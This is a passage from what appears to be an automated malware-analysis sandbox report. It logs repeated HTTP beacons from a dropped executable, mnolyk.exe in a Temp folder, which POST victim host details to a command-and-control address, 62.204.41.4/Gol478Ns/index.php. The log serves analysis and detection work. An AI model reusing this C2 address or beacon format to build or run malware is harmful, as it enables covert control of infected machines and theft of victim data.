                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:43.672183037 CET | 715 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      601 | 192.168.2.7 | 50296 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:43.846360922 CET | 716 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:43.909090042 CET | 716 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      602 | 192.168.2.7 | 50297 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:44.097127914 CET | 717 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:44.163500071 CET | 717 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      603 | 192.168.2.7 | 50298 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:44.339808941 CET | 718 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:44.403513908 CET | 718 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      604 | 192.168.2.7 | 50299 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:44.598784924 CET | 719 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:44.664676905 CET | 719 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      605 | 192.168.2.7 | 50300 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:44.841607094 CET | 720 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:44.907110929 CET | 720 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      606 | 192.168.2.7 | 50301 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:45.082072020 CET | 721 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:45.146536112 CET | 721 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:45 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      607 | 192.168.2.7 | 50302 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:45.325484991 CET | 722 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:45.388547897 CET | 722 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:45 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      608 | 192.168.2.7 | 50303 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:45.572465897 CET | 723 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:45.634674072 CET | 723 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:45 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      609 | 192.168.2.7 | 50304 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:45.806701899 CET | 724 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:45.867981911 CET | 724 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:45 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      61 | 192.168.2.7 | 49756 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:16.330636978 CET | 176 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:16.396106958 CET | 176 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      610 | 192.168.2.7 | 50305 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:46.051156044 CET | 725 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:46.116750956 CET | 725 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:46 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      611 | 192.168.2.7 | 50306 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:46.316046000 CET | 726 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:46.379158020 CET | 726 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:46 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      612 | 192.168.2.7 | 50307 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:46.569596052 CET | 727 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:46.632174015 CET | 727 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:46 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      613 | 192.168.2.7 | 50308 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:46.817929983 CET | 728 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:46.883155107 CET | 728 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:46 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      614 | 192.168.2.7 | 50309 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:47.063196898 CET | 729 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:47.130172968 CET | 729 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      615 | 192.168.2.7 | 50310 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:47.315519094 CET | 730 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:47.380167007 CET | 730 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      616 | 192.168.2.7 | 50311 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:47.562395096 CET | 731 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:47.626136065 CET | 731 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      617 | 192.168.2.7 | 50312 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:47.795938015 CET | 732 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:47.859386921 CET | 732 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      618 | 192.168.2.7 | 50313 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:48.033864975 CET | 733 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
